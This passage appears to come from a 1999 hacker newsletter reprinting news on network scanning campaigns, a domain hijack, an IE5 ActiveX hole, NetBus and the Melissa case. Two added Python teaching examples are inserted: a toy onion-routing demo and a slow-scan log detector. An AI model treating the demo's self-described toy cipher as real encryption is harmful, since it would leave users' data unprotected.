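The layered relay delivery described under "How it works" above, modelled as an added example (not Zero-Knowledge's code: Freedom's real cipher, key exchange and packet format are not described here, so a toy SHA-256 keystream with an HMAC tag and pre-shared per-hop keys stand in for them). Each relay can open exactly one layer, learns only the next hop, and forwards an opaque blob, which is why no single relay can link sender to destination.

```python
"""Layered-relay ("onion") delivery: each relay peels one layer, learns only the
next hop and forwards an opaque blob, so no single relay links sender to
destination.  Constructed teaching example; the stream cipher below is a toy
SHA-256 keystream standing in for a real cipher, and per-hop keys are assumed
to be pre-shared instead of negotiated."""
import hashlib
import hmac
import os
import struct

NONCE_LEN, TAG_LEN = 16, 32

def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Toy stream cipher (placeholder): XOR data with SHA-256(key||nonce||ctr) blocks.
    The same call encrypts and decrypts."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + nonce + struct.pack(">I", i // 32)).digest()
        out.extend(b ^ k for b, k in zip(data[i:i + 32], block))
    return bytes(out)

def seal(key: bytes, plaintext: bytes) -> bytes:
    """One layer: nonce || ciphertext || HMAC tag (so a relay rejects tampered blobs)."""
    nonce = os.urandom(NONCE_LEN)
    ct = keystream_xor(key, nonce, plaintext)
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag

def open_layer(key: bytes, sealed: bytes) -> bytes:
    """Peel one layer; raises ValueError if the key is wrong or the blob was altered."""
    nonce, ct, tag = sealed[:NONCE_LEN], sealed[NONCE_LEN:-TAG_LEN], sealed[-TAG_LEN:]
    expect = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expect):
        raise ValueError("layer integrity check failed")
    return keystream_xor(key, nonce, ct)

def build_onion(route, hop_keys, destination: str, payload: bytes) -> bytes:
    """Sender wraps the innermost layer first.  The layer for relay i holds
    "<next hop>\\0<inner blob>"; the last relay's layer names the destination."""
    blob, next_hop = payload, destination
    for hop in reversed(route):
        blob = seal(hop_keys[hop], next_hop.encode() + b"\x00" + blob)
        next_hop = hop
    return blob  # handed to route[0]

def relay_peel(hop: str, hop_keys, blob: bytes):
    """Everything relay `hop` learns: the next hop's name and an opaque blob."""
    inner = open_layer(hop_keys[hop], blob)
    next_hop, _, rest = inner.partition(b"\x00")   # hop names contain no NUL
    return next_hop.decode(), rest

def deliver(route, hop_keys, onion: bytes):
    """Drive the packet along the route; returns the payload the destination gets
    and the (relay, next_hop) view each relay had.  The blob shrinks by
    NONCE_LEN+TAG_LEN per hop: a real design pads to a fixed size to hide position."""
    views, blob = [], onion
    for hop in route:
        next_hop, blob = relay_peel(hop, hop_keys, blob)
        views.append((hop, next_hop))
    return blob, views

def demo():
    route = ["relay-A", "relay-B", "relay-C"]          # independently operated relays
    keys = {hop: os.urandom(32) for hop in route}       # assumed pre-shared per-hop keys
    onion = build_onion(route, keys, "example.invalid", b"hello from a pseudonym")
    payload, views = deliver(route, keys, onion)
    # relay-B cannot open the outer layer, so it cannot see where the packet started
    try:
        open_layer(keys["relay-B"], onion)
        middle_sees_origin = True
    except ValueError:
        middle_sees_origin = False
    return payload, views, middle_sees_origin

if __name__ == "__main__":
    payload, views, leak = demo()
    for relay, nxt in views:
        print(f"{relay} forwards to {nxt}")
    print("destination received:", payload, "| middle relay opened origin layer:", leak)
```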
"The end result will be that American companies will lose leadership in this field," he said, "and it is not going to result in encryption being out of the hands of anyone our government might be concerned about."

@HWA

15.0 Who's doing the Scanning?
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

Netsentry.net and all IPs in the 38.x.x.x range appear to be systematically scanned. Owners of machines in that range, which is controlled by PSINet, want action to be taken, but what action? So far scanning is not illegal, so what can be done? And who is doing the scans and why?

MSNBC
http://www.msnbc.com/news/302835.asp

Scanning for trouble
Relentless computer 'probes' cause concern, but no damage yet

By Bob Sullivan
MSNBC

Aug. 23 — Dragos Ruiu was just minding his own business, a Vancouver software start-up, when it started. Day after day, relentlessly, someone or some group out there on the Internet is banging away at his servers, sneaking in and gaining full access. A security expert, he knows what's happening: He's being probed. Is this mere sport, or a "casing," like a bank robber who visits the bank several times to study its security systems before the heist?

EVERY DAY they come, they lurk — then they leave without doing damage. And Ruiu is powerless to stop it. Every method he has tried, they have trumped. They're toying with him. "They must feel like gods," he says.

They come at him through clients' computers, through Canadian ISPs, once even through one of the largest Canadian banks. They hack into Linux boxes, NT boxes, Unix boxes. Hack by day or night. No matter. And all for no apparent reason. They look, but don't touch.

Ah, the life of a network administrator these days. There are thousands of ways to break into a computer, and there are now several downloadable software packages designed to scan the Internet for Web sites and servers that have just one flaw.
According to Peter Tippett at computer security research firm ICSA, a new box connected to the Net will almost certainly be "scanned" before one week goes by. And the amount of scanning activity has doubled in the past six months.

That's about when the scanning started for Brandon Pepelea, a former employee at PSINet who says his collection of Web sites has been scanned systematically several times a week since January. In another example of a victimless probe, Pepelea thinks someone or something has been banging through all the Internet addresses between 38.240.x.x and 38.200.x.x, a so-called Class-B range of addresses that constitute about 16,000 possible computers.

In his case, the scans were unsuccessful. Whoever or whatever it is, they haven't been able to break into Pepelea's computers. Still, the relentless, systematic nature of the probe has him spooked. He's been demanding that PSINet, which owns all the addresses in the 38.x.x.x range, chase down the scanner and prosecute.

"I don't think they understand how serious it is," Pepelea said. "The threat not so much being the nature of the scan but the scope of the scan... If you're between 38.240 and 38.200 you've had the scans. They've walked through and gotten to you."

NOSE FOR TROUBLE

The attack itself involves use of the Simple Network Management Protocol, frequently used on network routers. Pepelea owns machines between the 38.240 and 38.200 address range, and concluded scans spanned that range by studying patterns of hits to his own and his client's machines.

This is not the first time Pepelea, now CEO of a small security company he calls "Designer's Dream," has done a hefty amount of personal cybersleuthing. Last December, he compiled information on a virus writer named VicodinES, and shared it with the FBI, the CIA and other law enforcement agencies.
His tips fell on deaf ears, and VicodinES, who the world now knows as Dave Smith, went on to release the Melissa virus. Pepelea's hell bent on being heard this time around. "Once again, nobody cares," he laments.

PSINet said early last week the scans were being generated by an account serviced by the company, and that it had dealt with the matter by canceling the account. But by Friday, the company had canceled three more accounts in an effort to stop the probes. While officials there say they take the matter seriously, they are not convinced it's an organized hacker attack.

"It's not possible to characterize whether this is a mistake, a malicious event, was planned, or it just happened," said Cole Libby, Director of Network Engineering. For example, it could be a wrongly configured piece of hardware searching a section of the Internet for a new printer. "There are lots of examples of technology out of control in the world."

NO HARM, NO FOUL?

Scanning, the cyberspace equivalent of walking down Main Street and jiggling handles to see who leaves the front door unlocked, brings up murky legal issues. Entering someone else's computer is illegal, but scanning, which amounts to asking a computer how it's been set up, probably isn't. Pepelea says PSINet told him to pursue legal action against his cyberpest — but for what?

Meanwhile, Pepelea thinks PSINet should be liable if any real trouble ever comes from his suspected hacker, particularly since the Net provider was warned. That's not likely, says Internet law expert Dorsey Morrow. PSINet would almost certainly face no criminal liability for the actions of a hacker on their network, and wouldn't likely face civil liability either.

"As long as they can show 'We were doing everything we can. We've got security policies in place. We're using the latest software.' That mounts up to a pretty good defense," Morrow said.

So there are no consequences for scanning, either to the hacker or the company that provides the means.
But what of Ruiu's hackers, who go just one step further than Pepelea's scanners? They scan, then enter, lurk around, and leave. Dancing tantalizingly over the edge of the law, they show an ability to do far more damage.

Their methods are painstakingly deliberate, designed to avoid detection. They launch attacks from multiple sites, sometimes sending no more than a packet per day from any site, in order to hide the kind of suspicious activity protective "sniffer" programs look for.

"We saw one new machine coming at us every five minutes," Ruiu said. "They must have felt like gods because they could break into any machine they wanted." That includes a collection of Canadian ISPs, and even one major Canadian bank, that the hackers broke into.

When he called, Ruiu often had a tough time convincing victimized ISP administrators they'd been hacked. "The reaction of ISPs was disbelief," he said. "One didn't believe us until a marketing guy had his laptop taken out and it started sending weird packets."

Ruiu is convinced the hacks are coming from a coordinated team, because of their speed and variety. But while the cat-and-mouse game continues, he can only speculate on motive. His company, a 15-person startup called Netsentry.net, is hardly a big target. So Ruiu thinks his outside efforts in the security community are likely to blame. He recently worked on a project called "Trinux," which aimed to create a security-enhanced version of Linux that fits on one floppy disk. Among his partners was Ken Williams, who until recently ran Packet Storm Security, perhaps the most popular reference site in the hacker community.

"I suspect these guys are targeting security software," he said, but added they have not revealed their intentions. "This is really bugging me. The lack of a motive really disturbs me...it gave me the creeps."

The attacks have also been humbling for Ruiu, who has spent a lot of time chasing the hackers when he could be working to get his business off the ground.
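One way to catch the trickle-from-many-sources pattern Ruiu describes, as an added example (not Netsentry's tooling or MSNBC's data; the log format, addresses and thresholds are constructed): a per-source scan threshold of the kind the "sniffer" programs applied stays quiet when each host sends a packet a day, while aggregating by service and target range over a week-long window surfaces the coordinated sweep.

```python
"""Detect the probe pattern in the story above: many unrelated sources, each
sending a trickle (a packet a day or less), that together walk a target range.
A per-source threshold stays quiet; aggregating by service and target range
over a long window does not.  Constructed example with constructed log lines;
not Netsentry's tooling or MSNBC's data."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# Constructed firewall log: timestamp action src dst proto dport.
SAMPLE_LOG = """\
1999-08-16T02:10:00 DENY src=203.0.113.5 dst=38.201.3.10 proto=udp dport=161
1999-08-17T04:55:00 DENY src=198.51.100.12 dst=38.205.7.44 proto=udp dport=161
1999-08-18T01:20:00 DENY src=192.0.2.200 dst=38.212.0.9 proto=udp dport=161
1999-08-19T23:05:00 DENY src=203.0.113.77 dst=38.219.88.1 proto=udp dport=161
1999-08-20T03:40:00 DENY src=198.51.100.99 dst=38.224.5.5 proto=udp dport=161
1999-08-21T05:15:00 DENY src=203.0.113.150 dst=38.231.14.2 proto=udp dport=161
1999-08-22T02:30:00 DENY src=192.0.2.31 dst=38.237.200.20 proto=udp dport=161
1999-08-23T23:40:00 DENY src=198.51.100.7 dst=38.240.1.1 proto=udp dport=161
1999-08-18T09:00:00 ALLOW src=192.0.2.50 dst=38.201.3.10 proto=tcp dport=80
1999-08-19T09:02:00 ALLOW src=192.0.2.50 dst=38.201.3.10 proto=tcp dport=80
1999-08-20T09:01:00 ALLOW src=192.0.2.50 dst=38.201.3.10 proto=tcp dport=80
1999-08-21T11:00:00 DENY src=198.51.100.200 dst=38.201.3.1 proto=tcp dport=25
1999-08-21T11:00:01 DENY src=198.51.100.200 dst=38.201.3.2 proto=tcp dport=25
1999-08-21T11:00:02 DENY src=198.51.100.200 dst=38.201.3.3 proto=tcp dport=25
1999-08-21T11:00:03 DENY src=198.51.100.200 dst=38.201.3.4 proto=tcp dport=25
1999-08-21T11:00:04 DENY src=198.51.100.200 dst=38.201.3.5 proto=tcp dport=25
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\w+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"proto=(?P<proto>\w+) dport=(?P<dport>\d+)$")

def parse(lines):
    """Turn log lines into events; malformed lines are skipped rather than crash."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]),
                           "src": ipaddress.ip_address(m["src"]),
                           "dst": ipaddress.ip_address(m["dst"]),
                           "proto": m["proto"], "dport": int(m["dport"])})
    return events

def single_source_sweeps(events, min_hosts=5):
    """Classic per-source check: one source touching many hosts on one service."""
    touched = defaultdict(set)
    for e in events:
        touched[(str(e["src"]), e["proto"], e["dport"])].add(e["dst"])
    return {k: len(v) for k, v in touched.items() if len(v) >= min_hosts}

def coordinated_slow_probes(events, target_net, min_sources=6, max_per_source=2, min_hosts=5):
    """Low-and-slow check: per service, many sources each sending at most
    max_per_source packets, whose destinations together cover min_hosts or more
    in target_net over the whole window."""
    net = ipaddress.ip_network(target_net)
    per_service = defaultdict(lambda: {"src": defaultdict(int), "dst": set(), "ts": []})
    for e in events:
        if e["dst"] not in net:
            continue
        s = per_service[(e["proto"], e["dport"])]
        s["src"][e["src"]] += 1
        s["dst"].add(e["dst"])
        s["ts"].append(e["ts"])
    findings = []
    for (proto, dport), s in per_service.items():
        counts = list(s["src"].values())
        if (len(counts) >= min_sources and max(counts) <= max_per_source
                and len(s["dst"]) >= min_hosts):
            findings.append({"service": f"{proto}/{dport}", "sources": len(counts),
                             "hosts": len(s["dst"]),
                             "span_days": (max(s["ts"]) - min(s["ts"])).days,
                             "max_packets_per_source": max(counts)})
    return findings

def analyze(lines, target_net="38.0.0.0/8"):
    """Run both checks over a log; the target range defaults to the 38/8 block."""
    events = parse(lines)
    return single_source_sweeps(events), coordinated_slow_probes(events, target_net)

if __name__ == "__main__":
    sweeps, slow = analyze(SAMPLE_LOG)
    print("single-source sweeps:", sweeps)       # catches the tcp/25 walker only
    print("coordinated slow probes:", slow)      # catches the eight-source udp/161 sweep
```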
"There are a lot of assumptions we're all making about Internet security that we shouldn't," he said. "There's a lot of things we don't know."

For example, these hackers made a habit of hijacking machines Ruiu's computers normally talked to, then initiated attacks from these supposedly "friendly" computers. That made them almost impossible to detect. "If they get a machine that's close to your machine, that's almost as bad as taking over your Web server. It's a great place to launch an attack on your firewall," he said.

Nothing about Ruiu or Pepelea's stories surprised ICSA's Tippett, who expects security problems to get worse before they get better. "It's the wild, wild West out there," he said. "The tools are pervasive and so common. The chance of getting caught is pretty slim... Our neighbors are now very close and enough of them don't have a great social conscience."

A more extensive report on one of these attacks, written by Ruiu, can be found at www.securityfocus.com.

If you have more information about this story, e-mail tipoff@msnbc.com.

@HWA

16.0 Japanese Police Go After Copyright Infringers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Hosimi

The Akita Prefectural Police are investigating the activities of a civil servant who allegedly posted accounting software and MP3s to the internet in violation of copyright law. The suspect had all of his computer equipment confiscated last month.

Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/79863

Akita Prefecture Police Pursue Internet Crime

August 24, 1999 (TOKYO) -- The Akita Prefectural Police on Aug. 19 sent papers alleging unauthorized Internet program delivery to the Akita District Prosecutor's Office, for prosecution. The case is being pursued by the Kisakata Police Station.
In the case, a male civil servant residing in Akita Prefecture is believed to have been engaged in unauthorized free delivery of personal computer programs and digital music data over the Internet. The man is suspected of infringing on the right of public transmission under the Copyright Law. According to the prefectural police, the man had registered accounting software of Obic Business Consultants Ltd. and MP3-based musical data on his home PC. He is suspected of having posted these programs on the Internet so that PC users can download them free of charge.

In June, the Kisakata Police Station investigated the man's house and confiscated his PCs and peripheral equipment. The police decided to send papers pertaining to the case to the district public prosecutor's office because the free delivery of PC software was deemed to be illegal, it said. The Japan Society of Rights of Authors and Composers has already accused the man of unauthorized delivery of musical data.

The Akita Prefectural Police's task force specializing in high-tech crimes played a significant role in this investigation. To combat the increasing number of high-tech crimes, the National Police Agency is calling on prefectural police stations to organize task forces specializing in high-tech crimes, starting in the current fiscal year. The task force set up by the Akita police has reportedly contributed substantially to analysis of communications records and other matters related to the case.

(BizTech News Dept.)

@HWA

17.0 Anti-Gay Web domain Returned to Original Owner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Code Kid

Last week the web domain registration of www.godhatesfags.com was altered to point to the same people who own www.godlovesfags.com. The change was accomplished by someone using an anonymous remailer with the internic registration database. The admins of www.godlovesfags.com have returned the domain to the original owner.

CNN
http://cnn.com/TECH/computing/9908/23/hack.folo/index.html

Anti-gay site goes back to rightful owners

August 23, 1999
Web posted at: 4:52 PM EDT (2052 GMT)

By D. Ian Hopper
CNN Interactive Technology Editor

As slowly as it came, the road to love veered back to hate on an anti-gay Web site run by Pastor Fred Phelps of the Westboro Baptist Church in Topeka, Kansas. Last Wednesday, domain name registrar Network Solutions' Internic directory was fooled into associating the godhatesfags.com domain name with the server containing godlovesfags.com, a pro-gay site.
Kris Haight, a systems administrator at Sugar-River.Net, a New Hampshire Internet service provider, still maintains that he did not make the change himself, and was the beneficiary of a still-anonymous hacker. His site received about 70,000 page views after the switch, which had only received a total of 7,500 page views prior to Wednesday.

Haight finally relinquished the name on Friday, after pressure from his employer and his employer's service provider, a larger Internet provider which sells connectivity to the smaller ISP. According to Haight, a lawyer from the Phelps organization contacted the larger provider, Destek Networking Group of Nashua, New Hampshire, and threatened action. Destek then contacted Haight.

Haight then attempted to contact Phelps, leaving a message telling Phelps to check his e-mail for a notice from Internic that the domain name was pointed back to the original host server. Phelps' organization refused to confirm the call to Destek, and continued to downplay the incident.

"It hasn't hurt us one iota," said Shirley Phelps-Roper, Fred Phelps' daughter and a lawyer for the organization. "It demonstrated to the world that fags are what we said they are. These experiences confirm what the scripture says about them. They are lawless; nothing is sacred with them."

T. Parssinen, owner of Sugar-River.Net and Haight's employer, said he knew nothing of the change until after it happened.

"We received an e-mail giving a server change to godhatesfags," Parssinen explained, "But I didn't notice anything in particular. I thought, 'Oh, that's Kris's domain, I don't have to do anything about it.' It was so close that it didn't register to me what it actually was." The next day, Kris told him what he did. "I said, 'You're going to have to give that back,' and he said he would."

Parssinen said he doesn't anticipate any legal action and will continue to host the godlovesfags Web site. Haight is leaving the company for another job opportunity.
According to Parssinen, it's just in time. "To demonstrate to everybody that we had nothing to do with what took place, we would have been forced to terminate his employment."

A mystery remains, though. Who made the switch? Parssinen said he doesn't think Haight knew how to do it himself, and Haight refuses to give any more information about the e-mail that told him to watch for the switch, other than it was from an anonymous remailer.

There's plenty of speculation, however, ranging from a Phelps ploy to sabotage himself in order to get more media attention, to a result of the recent Chaos Communication Camp in Germany, to a challenge made to hackers to reassign a set of domain names.

Nevertheless, Network Solutions spokesperson Nancy Huddleston said that there are three levels of domain name security, and relatively few choose the highest level, password encryption. With that level, this sort of domain redirection wouldn't have been nearly as easy to do. "We just sent another alert to our users telling them about the three levels of security," Huddleston said.

Even with more security, it seems almost inevitable that high-profile and controversial sites will continue to be a prime target for attention-hungry hackers. Phelps-Roper has resigned herself to that fact, reporting that the godhatesfags site has been a target many times before, usually with denial-of-service attacks.

"You know there's 365 days in a year," Phelps-Roper said. "If we're down 3, we're still up the rest. We don't really care."

(Gotta love their attitude, this kills me... bahahaha - Ed)

@HWA

18.0 EXPLOIT-DEV Mailing List Started
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ryan

In an effort to promote discussion on potential or undeveloped holes a new mailing list has been created by the folks at Security Focus. The list will be dedicated to interactively developing exploits.
Security Focus
http://www.securityfocus.com/forums/exploit-dev/faq.html

We are pleased to host a new security mailing list that may be of interest to BUGTRAQ subscribers.

What is EXPLOIT-DEV?

There are many forums for reporting security bugs and distributing exploit code or examples. A prime example of such a forum is the BUGTRAQ mailing-list. However, nearly all of these forums exist mostly for the dissemination of fully-researched reports, and they leave little room for discussion. In addition, many bugs are spotted but not written up, due to lack of interest, time, or expertise. The EXPLOIT-DEV list exists to allow people to report potential or undeveloped holes. The idea is to help people who lack expertise, time, or information about how to exploit a hole do so.

The EXPLOIT-DEV list is dedicated to the concept of full disclosure. We believe that release of exploit code serves the security community overall. Since the list is dedicated to interactively developing exploits, there will generally NOT be an opportunity to warn software vendors or authors. In many cases it will not be clear that there is a problem until the exploit or description is finalized, at which point all list subscribers will know. It is very appropriate to notify vendors or authors as soon as it is clear there is a problem.

For more information read http://www.securityfocus.com/forums/exploit-dev/faq.html

To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of:

SUBS EXPLOIT-DEV Firstname Lastname

--
Elias Levy
Security Focus
http://www.securityfocus.com/

@HWA

19.0 NetBus - Product Under Siege
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Judd

UltraAccess.net, the company that makes NetBus Pro, is lashing out against Anti-Virus vendors for restricting sales of its product by labeling the software as a virus. NetBus Pro 2.1 is a remote administration tool similar to Back Orifice that allows an administrator to control a remote system.
UltraAccess.net is claiming that AV vendors like Symantec think that NetBus is competition for their remote administration software and that is why it is being flagged by the AV software. UltraAccess says that unless some sort of agreement can be reached they may pursue legal action against AV companies for defamation and restraint of trade.

UltraAccess.net
http://www.ultraaccess.net

@HWA

20.0 Worst Security Hole Ever?
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

This new hole in Internet Explorer 5 allows an infocriminal to place a program on a victim's hard disk that will be executed at the next reboot. The bug can be exploited from a user opening a web page or reading an email. The problem is located with an Active X control called "Object for constructing type libraries for scriptlets". Microsoft is working on a fix, in the meantime users are urged to turn off Active X within their browsers. (Sure glad I use Netscape.)

Georgi Guninski's Home Page - Demo and Source Code Available
http://www.nat.bg/~joro/

Internet News
http://www.internetnews.com/prod-news/print/0,1089,9_188461,00.html

New IE5 Security Bug the Worst Ever?

August 24, 1999
Brian McWilliams, InternetNews.com Correspondent

Bulgarian browser bugmeister Georgi Guninski is at it again. The 27-year-old independent computer consultant has discovered a new security flaw affecting Internet Explorer 5, which enables a malicious hacker to place a program on the victim's hard disk, to be executed at the next reboot.

Guninski is credited by Microsoft with discovering and publicizing a number of significant security flaws in its Internet Explorer browser in the past year. While he's also spotted several security bugs in Netscape's Navigator, Guninski is especially fond of poking holes in Active X, the scripting technology used in IE.
"I think this is the most significant of my discoveries and the most dangerous also," Guninski told InternetNews Radio. "It allows a Web page or e-mail message to take control of the computer and do anything."

According to Guninski, the attack can be launched by causing IE5 users to click on a hyperlink on a web page, but it also can be transmitted by e-mail to users of Microsoft's Outlook 98. The exploit places an executable program in an HTML Application file in a Windows 95 or 98 computer's start-up folder. When the victim reboots his or her computer, the program will execute.

Guninski said the problem lies in an Active X control called "Object for constructing type libraries for scriptlets". He has posted a demo and source code of the exploit at his Web site.

Microsoft officials were not immediately available for comment. Guninski asserts that the company has reproduced the bug and plans to issue a patch. In the meantime, concerned IE5 users can protect themselves by going into the Security tab of the browser's Internet Options menu, and disabling ActiveX controls or plug-ins.

@HWA

21.0 IRC Banned in Malaysia
~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by AlienPlague

Undernet, EFnet and DALNet, Internet Relay Chat Networks, had banned users from Malaysia for seven days last week. Both of Malaysia's Internet service providers, Jaring and TMNet, had been banned from using the networks, effectively cutting off the entire country. The ban was due to users in the country abusing the networks' services. After discussions with both ISPs the ban was lifted last Friday.
South China Morning Post
http://www.technologypost.com/internet/Daily/19990824110643506.asp?Section=Mai

INTERNET

Malaysians banned from global IRC network

NEWSBYTES

Undernet, a worldwide Internet Relay Chat (IRC) network that allows people to connect to its privately-run computer servers free of charge to communicate in real time over the Internet, has banned Internet users from both of Malaysia's only two Internet service providers (ISPs) for abusing its services.

Although Undernet is one of many IRC networks, it is one of the largest and joins two of the other largest - DALNet and EFnet - in instituting temporary or permanent bans on Internet users logging on from the Jaring or TMNet ISPs in Malaysia. Bans typically run for several hours to days or weeks depending on the network and the level of abuse and the response of ISPs to complaints from IRC network administrators.

Within the IRC community, abusive behaviour ranges from repeated offensive behaviour toward other users, automatically flooding chat rooms with multiple messages, running robot programs and launching denial of service attacks against other users or the servers themselves (basically, trying to hack the system and bring it down).

Because Internet users often connect from dial-up connections it is impossible for IRC networks to identify and ban an individual user as they can just log out and return with a different IP address. This is where IRC administrators ask ISPs for assistance with serious offenders who do not respond to IRC operators' requests to cease online. Since the ISP can connect an IP address at any point in time to a particular user, they are in a position to pass on a warning or even account termination if hacking is against the ISP's terms of service, which is the case for most ISPs worldwide.

IRC networks do not usually take the next step and ban a whole ISP's domain, and so all of its users guilty and innocent, unless the ISP is unresponsive to abuse reports.
Undernet found that Jaring and TMNet administrators ignored abuse reports, and so it was forced to ban all users from both services for seven days last week.

"In the last few months alone, over 182,300 global bans have been set against various addresses in the *@*.my domain," read an Undernet.org e-mail sent to Jaring and TMNet. "We simply cannot afford to absorb the costs of these attacks any longer.

"We must either reach some form of working, responsible relationship with the administrators of the various *.my providers, or these bans will become permanent.

"Basically, we are only asking that they support and enforce their own policies they have in place already."

Undernet lowered the bans against Jaring on Friday after some discussion between the two organisations. The network presented the ISP with a list of requests and suggestions for abuse management. TMNet, the ISP arm of national telco Telekom Malaysia, had not contacted Undernet on Friday, and on Sunday a permanent ban was placed on the TM.net.my IP space.

Undernet officials said that the bans were not about Malaysian Internet users being particularly worse behaved than any other country's. They said it was about "irresponsible and unresponsive administration of the Malaysian ISPs".

"We are not singling out Malaysia, but it is in general the most abusive domain currently accessing the Undernet," said Undernet. "Malaysian IP space and resources are being used to launch denial of service attacks and the last attack against one of our routing servers was the straw that broke the camel's back."

Undernet estimated it costs its hosts US$2.2 million in bandwidth alone to run the Undernet network each year. At times more than 30,000 users are connected simultaneously from all around the world.
@HWA

22.0 I want my, I want my, I want my HNN - more goodies from HNN
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

Monday HNN announced that the new Java HNN News Ticker is available on the Affiliate Resources page. Today we are happy to announce several new ways in which you can receive your HNN. With our new XML backend we now have channels on My Netscape and My Userland. This is in addition to our box on Slashdot and our previously announced PQA for the Wireless Palm Pilot. We've got even more features in the works, so keep your eyes open.

I want my HNN
http://www.hackernews.com/misc/myhnn.html

@HWA

23.0 Melissa Creator Admits Guilt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

David L. Smith, the man who has been charged with creating and disseminating the Melissa virus, admitted to investigators that he did it, according to court papers. Lawyers for the defense dispute that an admission of guilt was made. Smith has pleaded not guilty to charges of interrupting public communication, conspiracy, theft of computer service, and wrongful access to computer systems. David Smith remains free on $100,000 bail.

C|Net
http://www.news.com/News/Item/0,4,40912,00.html?st.ne.fd.mdh.ni

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,85786-135501-944958-0,00.html

CNN
http://www.cnn.com/US/9908/25/melissa.virus.ap/index.html

C|Net;

Court papers: Smith admits to creating Melissa virus
By Erich Luening
Staff Writer, CNET News.com
August 25, 1999, 8:25 a.m. PT

update The New Jersey man charged with creating the Melissa virus, which disrupted computers around the world, admitted to investigators that he did it, according to court papers.

On April 1, David L. Smith was arrested by federal and state officials and charged with creating and disseminating the Melissa virus that began spreading across the Internet March 26.
Smith, 30, a resident of Aberdeen Township, New Jersey, was arrested at the home of his brother in Eatontown, New Jersey. Smith was tracked down with the help of America Online and by traced phone calls.

A spokesman for the New Jersey Attorney General's office told CNET's News.com that the prosecution "expects to see some kind of resolution by September." He would not elaborate further.

A brief filed in state superior court by supervising deputy attorney general Christopher G. Bubb said Smith waived his Miranda rights and spoke to investigators when police arrived at his apartment, according to a courthouse spokesperson.

Smith admitted to writing the "Melissa" macro virus, illegally accessing America Online for the purpose of posting the virus onto the Internet, and destroying the personal computer he used to post the virus, Bubb stated.

The state attorney filed his brief in response to a motion made by Smith's attorney Edward F. Borden Jr. seeking certain prosecution documents.

The FBI continues to provide assistance to New Jersey prosecutors in the case. Federal charges have not been levied against Smith. "The decision to bring federal charges against Smith is at the discretion of the U.S. Attorney," said FBI spokesperson Debbie Weierman.

In April, Smith pleaded not guilty to charges of interrupting public communication, conspiracy to commit the offense, and the attempt to commit the offense. He also pleaded not guilty to charges of two lesser offenses: theft of computer service and wrongful access to computer systems. If convicted on the state charges, Smith faces a maximum of 40 years in prison and fines of $480,000.

AOL tipped the New Jersey attorney general's office to the virus's originator. AOL said it had tracked the source through a listserver to Monmouth County, New Jersey.

Since his arrest, Smith has changed attorneys.
The Melissa virus was first introduced on an "alt.sex" newsgroup using the AOL account of Scott Steinmetz, whose username was "skyroket." Steinmetz, a civil engineer in Lynnwood, Washington, told CNET News.com that he had nothing to do with writing or introducing the virus.

The virus used a combination of Microsoft's Outlook and Word programs to spread, taking advantage of users' email address book entries to gain the appearance of coming from a known person.

Smith remains free on $100,000 bail.

Nando Times;

Accused admitted creating 'Melissa' virus, prosecutor says

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

FREEHOLD, N.J. (August 25, 1999 10:57 a.m. EDT http://www.nandotimes.com) - The man charged with creating the Melissa computer virus that clogged e-mail systems around the world last spring admitted he created the bug, a prosecutor alleges in court papers.

David L. Smith, a former computer programmer, was arrested in April.

A brief filed in state Superior Court by Supervising Deputy Attorney General Christopher G. Bubb says Smith waived his Miranda rights and spoke to investigators when police arrived at his apartment.

"Smith admitted, among other things, to writing the 'Melissa' macro virus, illegally accessing America Online for the purpose of posting the virus onto cyberspace, and destroying the personal computers he used to post 'Melissa,'" Bubb wrote.

Defense lawyer Edward P. Borden Jr. told the Asbury Park Press of Neptune that he disputes Bubb's assertions. He refused to comment further, the newspaper reported Wednesday.

The Melissa virus was disguised as an e-mail marked "important message" from a friend or colleague of each recipient. It caused affected computers to create and send 50 additional infected messages. The volume of messages generated slowed some systems to a crawl.

Authorities say the virus was named after a topless dancer in Florida.
Bubb's brief was filed in response to a defense motion seeking additional prosecution documents. Borden says he needs the prosecution documents to file a motion to suppress evidence seized during the search of Smith's apartment. A hearing on his motion was to be held Wednesday afternoon.

Smith is charged with interruption of public communications, conspiracy and theft of computer service. The maximum penalty for the offense is 40 years in prison. He remains free on $100,000 bail.

CNN;

Prosecutor says man admitted creating 'Melissa' computer virus

August 25, 1999
Web posted at: 10:49 AM EDT (1449 GMT)

FREEHOLD, New Jersey (AP) -- The man charged with creating the Melissa computer virus that clogged e-mail systems around the world admitted he created the bug, a prosecutor alleges in court papers.

David L. Smith, a former computer programmer, was arrested in April.

A brief filed in state Superior Court by Supervising Deputy Attorney General Christopher G. Bubb says Smith waived his Miranda rights and spoke to investigators when police arrived at his apartment.

"Smith admitted, among other things, to writing the 'Melissa' macro virus, illegally accessing America Online for the purpose of posting the virus onto cyberspace, and destroying the personal computers he used to post 'Melissa,'" Bubb wrote.

